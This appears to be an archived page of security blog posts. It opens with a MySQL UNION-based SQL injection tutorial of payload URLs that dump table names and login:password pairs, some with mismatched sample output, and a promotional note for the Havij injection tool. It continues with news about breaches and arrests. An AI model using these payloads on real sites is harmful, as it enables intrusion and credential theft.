We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)

We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article made by Mr. Rafael Souza one of the great admirer and fan of VOGH has gladly shared his brilliant research paper on SQL-Injection (MySql) with us. Rafael is a very passionate on cyber security domain and he is keenly involved with GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time lets go and see what Rafael has for us:- 

Discover The Infamous MySQL Injection Technique 

                                                                                        

ABSTRACT:

It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?

There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.

                                                                                                       
Understand the technique MySQL Injection: 

One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application. 

STEP BY STEP

 

(Figure 1) Detecting

Searching Column number (s): We will test earlier in error, then no error may be said to find.

(Figure 2) SQL Error 

Host Information,

Version of MySQL system used on the server.

(Figure 3) Host Information

(Figure 4) Location of the Files

Current database connection used between the "input" to the MySQL system

(Figure 5) Users of MySQL

(Figure 6) Current Time

Brute Force or Shooting

This happens in versions below 5.x.y

(Figure 7) Testing

Dump: This happens in versions up 5.x.y [ 1º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--

usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--

CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--

COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--

usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--

rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table

* Brute Force / Shooting

This happens in versions below 5.x.y

http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--

Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--

Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--

_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--

rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=

Dump

This happens in versions up 5.x.y [ 1º Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--

login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--

login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--

passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--

id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--

texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Extracting data from the columns of a given table

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--

_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--

_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--

_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=

Concat
group_concat() => Search all you want with ascii caracters

concat() => search what you want with ascii caracters

concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.

It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researcher and developers to beware and test your code.

CONCLUSION

Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?

The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.

The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.

**********

I hope you all will enjoy the above article, as I did. On behalf of entire VOGH Team I am sincerely thanking Mr. Rafael Souza for his remarkable contribution. 

To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)"https://www.voiceofgreyhat.com/2013/12/we-are-best-tool-for-web-application.html</a>

LulzSec Hacker Cody Kretsinger Sentenced 1 Year Imprisonment For Sony Breach

LulzSec Hacker Cody Kretsinger Sentenced 1 Year Imprisonment For Security Breach of Sony Pictures Entertainment  

Infamous LulzSec hacker Cody Kretsinger who pleaded guilty last year in front of Federal Court of California for taking part in an extensive computer breach of Sony Pictures Entertainment server has faced judgement. 25 year aged Kretsinger who is also known as "Recursion" was one of the key member of Lulz Security, widely known to us as LulzSec, an offshoot of the international hacking group Anonymous. According to federal prosecutors, Cody Kretsinger has been sentenced to one year in prison in  Los Angeles. This court rule has been followed by home detention. Kretsinger, was also been ordered by a U.S. district judge in Los Angeles to perform 1,000 hours of community service after his release from prison, said Thom Mrozek, spokesman for the U.S. Attorney's Office in Los Angeles. Although prosecutors refused to say whether the hacker was co-operating with authorities in return for a softer sentence. 

During last year's plea hearing, Kretsinger told a federal judge that he gained access to the Sony Pictures website and gave the information he found there to other members of LulzSec, who posted it on the group's website and Twitter. "I joined LulzSec, your honor, at which point we gained access to the Sony Pictures website," said Kretsinger in the federal court. Prosecutors said Kretsinger and other LulzSec hackers, including those known as "Sabu" and "Topiary," stole the personal information of thousands of people after launching an "SQL injection" attack on the website; ultimately caused the unit of Sony Corp more than $600,000 in finical damage, along with that the attack caused bad impact and loss of faith for Sony Corporation and it's customers across the globe. 

While talking about this story, we would like to recap the decent history - where the arrest followed by guilty pleading of all the key members of LulzSec including  Ryan Cleary, Jake Davis, Jeremy Hammond, Raynaldo Rivera & Cody Kretsinger came a month after court documents revealed that Anonymous leader "Sabu," whose real name is Hector Xavier Monsegur, turned traitor to his community and became FBI informer and provided all the information on fellow hackers.

-Source (Reuters & Yahoo) 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">LulzSec Hacker Cody Kretsinger Sentenced 1 Year Imprisonment For Sony Breach"https://www.voiceofgreyhat.com/2013/04/Cody-Kretsinger-Get-1-Year-Imprisonment-For-Sony-Breach.html</a>

Jadavpur University Official Website is Vulnerable to Sql Injection

Jadavpur University Official Website is Vulnerable to Sql Injection 

An ethical hacker from India named Chirag Singh have figured out serious loopholes in the official website of Jadavpur University -one of the most renowned and prestigious university of India. Chirag find blind Sql injection vulnerability which can be exploited by malicious purpose in order to harm the website and gain access. From the vulnerability report submitted by the hacker, it has been found that the web-server of Jadavpur University is using Red Hat Enterprise Linux 5 (Tikanga) where the web application technologies are Apache 2.2.3 and PHP 5.1.6; along with the back-end database is PostgreSQL. The hackers also managed to dump 11 database with more than 215 tables as shown in the picture below 

This issue has already been reported to the concern person and the webmaster of Jadavpur University, and due to security and privacy we are not exposing and mention the vulnerable link and dumped database.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Jadavpur University Official Website is Vulnerable to Sql Injection"https://www.voiceofgreyhat.com/2013/03/Jadavpur-University-Vulnerable-to-Sqli.html</a>

SQL Injection Vulnerability Affected All Versions of Ruby on Rails

SQL Injection Vulnerability Affected All Versions of Ruby on Rails (CVE-2012-5664)

Developers at Ruby on Rails are warning its users regarding a Sql Injection flaws which has affected all the current version of Ruby on Rails web framework. While exploiting the vulnerability an attacker can inject and even execute malicious codes into the web application. "Due to the way dynamic finders in Active Record extract options from method parameters, a method parameter can mistakenly be used as a scope. Carefully crafted requests can use the scope to inject arbitrary SQL," explained the Rails framework's developers. As soon as this vulnerability has been spotted in the wild, the maintainers of Ruby on Rails have released new versions that addresses the flaw, versions 3.2.10, 3.1.9 and 3.0.18. In their advisory Ruby on Rails team recommends that users running affected versions, which is essentially anyone using Ruby on Rails, upgrade immediately to one of the fixed versions mentioned earlier. "We're sorry to drop a release like this so close to the holidays but regrettably the exploit has already been publicly disclosed and we don't feel we can delay the release," Rails developer concluded. 

The original problem was disclosed on the Phenoelit blog in late December where the author applied the technique to extract user credentials from a Ruby on Rails system, circumventing the authlogic authentication framework. While talking about the vulnerability discloser of Ruby on Rails, we would like to remind you that, this is not the first time, earlier in 2012 a Russian security researcher named Homakov has found that Github has succumbed to a public key vulnerability in Ruby on Rails which is allowing a normal user to gain administrator access into the popular Rails Git.

Brief About Ruby on Rails:- Ruby on Rails, often shortened to Rails, is an open source full-stack web application framework for the Ruby programming language. Ruby on Rails runs on the general-purpose programming language Ruby, which predates it by more than a decade. Rails is a full-stack framework, meaning that it gives the web developer the ability to gather information from the web server, talk to or query the database, and render templates out of the box. As a result, Rails features a routing system that is independent of the web server. Ruby on Rails emphasizes the use of well-known software engineering patterns and principles, such as Active record pattern, Convention over Configuration, Don't Repeat Yourself and Model-View-Controller.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">SQL Injection Vulnerability Affected All Versions of Ruby on Rails"https://www.voiceofgreyhat.com/2013/01/SQL-Injection-Vulnerability-in-Ruby-on-Rails.html</a>

#ProjectWhiteFox -Team GhostShell Hacked 1.6 Million Accounts of NASA, ESA, Pentagon & FBI

#ProjectWhiteFox -Team GhostShell Hacked 1.6 Million Accounts of NASA, ESA, Pentagon & FBI

After the devastating "Project Blackstar" now the hacktivist group calling them selves "Team GhostShell" announced another big hack, where the hackers have targeted several big organizations. This round of cyber attack was going under the banner of #ProjectWhiteFox, in which GhostShell has posted log-in details of 1.6 million accounts they claim are taken from a series of attacks on organizations including NASA, FBI, European Space Agency and Pentagon, as well as many companies that partner with these organizations. The Anonymous subsidiary group has posted the details on Pastebin, while describing the aim of the hack; as part of their #ProjectWhiteFox campaign to promote hacktivism and freedom of information on the internet. The hacker group claimed that the leaked information contained log-in names, passwords, email addresses, CV & several other sensitive information. In their release GhostShell said - "For those two factors we have prepared a juicy release of 1.6 million accounts/records from fields such as aerospace, nanotechnology, banking, law, education, government, military, all kinds of wacky companies & corporations working for the department of defense, airlines and more."

GhostShell members also said that they have messaged security bosses about the insecurity a number of organizations they targeted during attacks throughout 2012, describing it as "an early Christmas present." 

In a Pastebin file, GhostShell features a list of 37 organizations and companies, including The European Space Agency, NASA’s Engineers: Center for Advanced Engineering, and a Defense Contractor for the Pentagon. GhostShell sets itself apart from other hacktivist groups by targeting more than just one company or organization, and then releasing the results of its attack all at once. This set of hacks is spread out across 456 links, many of which simply contain raw dump files uploaded to GitHub and mirrored on paste sites Slexy.org and PasteSite.com.

The uploaded files contain what appears to be user data that looks to have been obtained from the servers of the various firms (likely via SQL injection). The entries include IP addresses, names, logins, email addresses, passwords, phone numbers, and even home addresses. Email accounts include the big three (Gmail, Hotmail, and Yahoo), as well as many .gov accounts. There are also various documents and material related to partnerships between companies and government bodies, as well as sensitive information for the aforementioned industries. 

Furthermore, the group says it has sent an email to the ICS-CERT Security Operations Center, Homeland Security Information Network (HSIN), Lessons Learned and Information Sharing (LLIS), the FBI’s Washington Division and Seattle location, Flashpoint Intel Partners, Raytheon, and NASA. In it, they say to have detailed “another 150 vulnerable servers from the Pentagon, NASA, DHS, Federal Reserve, Intelligence firms, L-3 CyberSecurity, JAXA, etc.”

-Source (TNW)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">#ProjectWhiteFox -Team GhostShell Hacked 1.6 Million Accounts of NASA, ESA, Pentagon & FBI"https://www.voiceofgreyhat.com/2012/12/ProjectWhiteFox-TeamGhostShell-Hacked-1.6M-Accounts.html</a>

Adobe Confirms Data Breach, Hacker Leaked More Than 150,000 Customer Details

Adobe Confirms Data Breach, Hacker Leaked More Than 150,000 Customer Details 

Yet again Adobe, the American multinational computer software company had fallen victim of cyber attack. In September Adobe faced what it called a sophisticated cyber attack where hackers have breached Adobe server in order to compromise certificate to sign malware. As a move Adobe revoked those certificates on October 4th. After that massacre, here again one of Adobe's databases has been breached by a hacker and that it has temporarily taken offline the affected Connectusers.com website. The attacker who claimed responsibility for the attack, told that he used a SQL injection exploit in the breach. Adobe confirmed the breach and said that the hacker indeed managed to break into an Adobe server and copy the private credentials of approximately 150,000 users – including their names, email addresses and password hashes. Those affected accounts include Adobe customers, Adobe employees and partners along with U.S. military users including U.S. Air Force users, and users from Google, NASA, universities, and other companies. To prove the attack, the intruder, who goes by the name of "ViruS_HimA" and claims to be from Egypt, has released extracts from his haul on the Pastebin text hosting service. 

"It was an SQL Injection vulnerability -- somehow I was able to dump the database in less requests than normal people do," said ViruS_HimA. Users passwords for the Adobe Connect users site were stored and hashed with MD5, says the hacker, which made them "easy to crack" with freely available tools. And Adobe wasn't using WAFs on the servers, the hacker notes. "I just want to be clear that I'm not going against Adobe or any other company. I just want to see the biggest vendors safer than this," he told the press. "Every day we see attacks targeting big companies using Exploits in Adobe, Microsoft, etc. So why don't such companies take the right security procedures to protect them customers and even themselves?"

"Adobe is a very big company but they don't really take care of them security issues, When someone report vulnerability to them, It take 5-7 days for the notification that they've received your report!!" he wrote. "It even takes 3-4 months to patch the vulnerabilities!" 

While talking about such big cyber attacks, here we would like to give you reminder that in the last few months we have been a slew of attacks against the following sites: Guild Wars 2, Gamigo, Blizzard, Yahoo, LinkedIn, eHarmony, Formspring, Android Forums, Gamigo,  Nvidia,Blizzard, Philips, Zynga, VMWare, & so on. For all the latest on cyber security and hacking related stories; stay tuned with VOGH. 

-Source (Dark Reading, The-H)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Adobe Confirms Data Breach, Hacker Leaked More Than 150,000 Customer Details"https://www.voiceofgreyhat.com/2012/11/Hacker-Leaked-150000-Customer-Details-of-Adobe.html</a>

LulzSec Hacker 'Raynaldo Rivera' Arrested Over Sony Pictures Hack

LulzSec Hacker 'Raynaldo Rivera' Arrested Over Sony Pictures Hack

Last year hackers have targeted Sony many times.  Hacktivist Anonymous, Lulzsec have penetrated Sony's PSN network and stolen millions of user personal information. Later Sony was forced to shutdown its entire network & apologized for the whole massacre. Not only PSN, also Sony Online Entertainment, Sony Pictures, Several Sony's official website from different countries fallen victim to the hackers.  But in 2012 all the key members of LulzSec, who was mainly responsible for attack on Sony get busted one by one. Among them we can take the name of Jeremy Hammond, Ryan Ackroyd, Ryan Cleary, Jake Davis & so on. In the last move another hacker from LulzSec has been arrested in connection with an attack on Sony Pictures in June last year. A 20-year-old man 'Raynaldo Rivera' surrendered to FBI agents on Tuesday for his alleged hacking of Sony Pictures. If convicted, he could face up to 15 years in prison.

The arrest comes shortly after a judge postponed the sentencing of LulzSec ringleader Hector Xavier Monsegur, known by his nickname "Sabu," for his continued cooperation in the investigation. Monsegur provided information to the FBI, leading to the arrests of one American man and four in the U.K. in March. 

Rivera allegedly used a proxy server to hide his real IP address and used a SQL injection attack against Sony, according the indictment, which was unsealed on Tuesday. The type of attack involves the input of commands into web-based forms to see if the backend database will yield information. Rivera, who went by the online nicknames "neuron," "royal" and "wildicv," allegedly distributed Sony's information to other LulzSec members, who publicized it on the @LulzSec Twitter account, the indictment said. Damages to Sony exceeded US$5,000.

Prosecutors allege Rivera worked with Cody Kretsinger, who was indicted in Sept. 2011 for the same attacks on Sony. Kretsinger allegedly provided the coupon codes along with email addresses and passwords for an extensive data release by LulzSec on June 2, 2011. Kretsinger pleaded guilty in April and is scheduled for sentencing on Oct. 25, according to the FBI.

-Source (BBC, PCW)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">LulzSec Hacker 'Raynaldo Rivera' Arrested Over Sony Pictures Hack"https://www.voiceofgreyhat.com/2012/08/LulzSec-Hacker-Raynaldo-Rivera-Arrested.html</a>

Yahoo! Voice Compromised, 450K Login Credentials Stolen & Posted In Plain Text

Yahoo! Voice Compromised, 450K Login Credentials Stolen & Posted In Plain Text

After LinkedIn, eHarmony and Formspring here comes another big fish, guess who ?? Its one of the widely used web search engine - Yahoo! A list of over 453,491 email addresses and plain-text passwords, in a document named "Owned and Exposed" apparently from users of a Yahoo! service, is in circulation on the internet. According to security expert and former hacker and well known security expert Kevin Mitnick, the passwords belong to the little-known VoIP service, Yahoo! Voice. The information is contained in a 17MB text file and has been released by a group of hackers calling themselves the D33DS Company. Access to the original information is said to have been achieved through use of an SQL injection vulnerability, where databases are accessed through inadequately filtered parameters passing through the web front end. Whether the passwords were originally stored as plain text in the database or if the hackers had already cracked hashed passwords to produce the file is unclear. 

The original D33ds site that posted the login credentials (d33ds.co) was down as of early Thursday morning; however, the text file is available through torrents and sites such as Media Fire.

“We hope that the parties responsible for managing the security of this subdomain will take this as a wake-up call, and not as a threat,” the D33ds group said in the text file containing the leaked credentials. The group said it did not reveal which Yahoo service the hacked credentials came from “to avoid further damage.”

Yahoo confirmed it was hacked and provided the following statement:-

“An older file from Yahoo! Contributor Network (previously Associated Content) containing approximately 450,000 Yahoo! and other company users names and passwords was compromised yesterday, Of these, less than 5% of the Yahoo! accounts had valid passwords. We are taking immediate action by fixing the vulnerability that led to the disclosure of this data, changing the passwords of the affected Yahoo! users and notifying the companies whose users accounts may have been compromised. We apologize to all affected users. We encourage users to change their passwords on a regular basis and also familiarize themselves with our online safety tips at security.yahoo.com."

While looking at the current scenario we strongly advise you to change your Yahoo! passowrds immediately & also set a strong password in an alpha-numeric combination. Enjoy reading Voice of Greyhat & stay safe and happy on the Internet. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Yahoo! Voice Compromised, 450K Login Credentials Stolen & Posted In Plain Text"https://www.voiceofgreyhat.com/2012/07/yahoo-voice-compromised-450k-login.html</a>

Havij v1.16 Advanced & Automated SQL Injection Tool Released

Havij v1.16 Advanced & Automated SQL Injection Tool Released

One of the most preferred and widely used SQL-injector Havij has released another updated version (v1.16). In the middle of last year ITSec team made Havij 1.15 available, so after one year of hard work now we got the next edition of this marvellous SQL-i tool. As per survey Havij is listed as one of the finest and widely used tool used for finding SQL Injection vulnerabilities on a web page. It has been thoroughly used by hackers along with penetration testers over the whole spectrum. 

Brief About Havij :- It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

New Features :-

• Multithreading

• Oracle Blind injection method.

• Automatic all parameter scan added.

• New blind injection method (no more ? char.)

• Retry for blind injection.

• A new method for tables/columns extraction in mssql blind.

• A WAF bypass method for mysql blind.

• Getting tables and columns even when can not get current database.

• Auto save log.

Bug Fixed:- 

• url encode bug fixed.

• Trying time based methods when mssql error based and union based fail.

• Clicking get columns would delete all tables.

• Reseting time based method delay when applying settings.

• Oracle and PostgreSQL detection

For additional information & to Download Havij v1.16 Click Here 

 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Havij v1.16 Advanced & Automated SQL Injection Tool Released"https://www.voiceofgreyhat.com/2012/06/havij-v116-advanced-automated-sql.html</a>

'The Unknowns' Claimed to Breach NASA, European Space Agency, French & Bahrain Ministry of Defense, US Air Force

'The Unknowns' Claimed to Breach NASA, European Space Agency, French & Bahrain Ministry of Defense & Many More

A new group of hacker collective group calling themselves 'The Unknowns' had claimed to breach the security system of a range of government agencies, organizations & many high profile sites. According to a PasteBin release The Unknowns said that they hacked into ten different organizations and published documents and other data alleged to have originated from the servers. Among them there are NASA - Glenn Research Center, US military, US AIR FORCE, European Space Agency, Thai Royal Navy, Harvard, Renault Company, French ministry of Defense, Bahrain Ministry of Defense and Jordanian Yellow Pages. 

NASA has confirmed that an attack did take place on 20 April, but noted that no "sensitive or controlled information" was compromised. The ESA also admitted to having suffered an attack, which it said made use of SQL injection. 

The hacker group claims that their mission is not malicious, but rather to help. "Victims, we have released some of your documents and data, we probably harmed you a bit but that's not really our goal because if it was then all of your websites would be completely defaced but we know that within a week or two," said the groups post, "the vulnerabilities we found will be patched and that’s what we're looking for."  In other word they are pretending to be 'White Hat'.

If you dig the history you will find that previously NASA was hit many times by the hackers from different part of the world Such as Spamers targeted NASA, TeaMp0isoN hacked NASA official forum, Chinese Hackers hit NASA satellites, Indian hacker minhal stole secrete  information from NASA, Code Smasher has found CSRF vulnerability in the official website of Virtual Heliospheric Observeatory NASA and so on.

 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">'The Unknowns' Claimed to Breach NASA, European Space Agency, French & Bahrain Ministry of Defense, US Air Force"https://www.voiceofgreyhat.com/2012/05/unknowns-claimed-to-breach-nasa.html</a>

Google Increases Bounties For Serious Code Execution Bugs found in Google Product

Google Increases Vulnerability Bounties In Anniversary of Vulnerability Reward Program

In Anniversary of Vulnerability Reward Program Google has officially declared that the company is increasing its bounties for serious code execution bugs found in production versions of Google products. This announcement is made through the official blog of Google Online Security. The blog post says that the programme has been a great success so far, with over 780 vulnerability reports being received from around 200 individuals. In the first year of the programme's existence, Google has paid out around $460,000 in total. Bounties are only paid to individuals if the vulnerabilities have been disclosed in a responsible manner, allowing Google to fix them before hackers can build proof-of-concept attack code. 

At the same time, Google has decided to decrease rewards for flaws found in products that have been acquired by the company but have not yet been integrated into the main Google product line. The company says that it will decide what vulnerabilities qualify as high risk issues and will be paying bounties based on that assessment.

According to Google Online Security the bounties will be -

• $20,000 for qualifying vulnerabilities that the reward panel determines will allow code execution on our production systems. 

• $10,000 for SQL injection and equivalent vulnerabilities; and for certain types of information disclosure, authentication, and authorization bypass bugs. 

• Up to $3,133.7 for many types of XSS, XSRF, and other high-impact flaws in highly sensitive applications.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Google Increases Bounties For Serious Code Execution Bugs found in Google Product"https://www.voiceofgreyhat.com/2012/04/google-increases-bounties-for-serious.html</a>